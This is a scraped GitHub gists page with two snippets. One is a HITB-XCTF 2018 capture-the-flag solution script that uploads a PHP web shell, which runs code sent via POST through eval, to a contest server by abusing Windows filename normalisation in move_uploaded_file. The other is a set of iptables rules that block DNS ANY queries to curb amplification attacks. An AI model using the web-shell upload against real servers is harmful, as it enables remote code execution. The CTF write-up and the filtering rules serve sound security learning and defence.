Skip to content

Instantly share code, notes, and snippets.

GeE siamware

Block or report user

Report or block siamware

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@pich4ya
pich4ya / hitbxctf2018_upload.py
Created Apr 14, 2018
HITB-XCTF 2018 - Upload (Web) Writeup
View hitbxctf2018_upload.py
# @author LongCat (Pichaya Morimoto)
import requests, string
# On Windows OS move_uploaded_file function will convert "foo.php"
# followed by one or more of the chars \x2E (.), \x2F (/), \x5C (\) back to "foo.php".
# http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/
files = {'file': ('pwn.php ','<?php if(isset($_POST[0])){ eval($_POST[0]); }else{ phpinfo(); } ?>')}
values = {'submit': 'upload'}
phpshell = requests.post('http://47.90.97.18:9999/upload.php', files=files, data=values).text.strip(u'\ufeff').strip()
print phpshell
@guerrerocarlos
guerrerocarlos / block_ddos
Last active Mar 14, 2019
Blocking all ANY queries in DNS server to prevent DDOS DNS amplification attack
View block_ddos
iptables --flush
iptables -A INPUT -p udp --dport 53 -m string --from 50 --algo bm --hex-string '|0000FF0001|' -m recent --set --name dnsanyquery
iptables -A INPUT -p udp --dport 53 -m string --from 50 --algo bm --hex-string '|0000FF0001|' -m recent --name dnsanyquery --rcheck --seconds 60 --hitcount 1 -j DROP
iptables -A INPUT -p udp --dport 53 -m u32 --u32 $(python generate-netfilter-u32-dns-rule.py --qname . --qtype ANY) -j DROP
#iptables -A INPUT -p udp --dport 53 -m u32 --u32 $(python generate-netfilter-u32-dns-rule.py --qname isc.org --qtype ANY) -j DROP
#iptables -A INPUT -p udp --dport 53 -m u32 --u32 $(python generate-netfilter-u32-dns-rule.py --qname isc.org. --qtype ANY) -j DROP
iptables -A INPUT -p udp --dport 53 -m string --from 50 --algo bm --hex-string '|0000FF0001|' -j DROP
#para bloquear ataque isc.org
iptables -A INPUT -p udp -m string --hex-string "|03697363036f726700|" --algo bm --to 65535 -j DROP
You can’t perform that action at this time.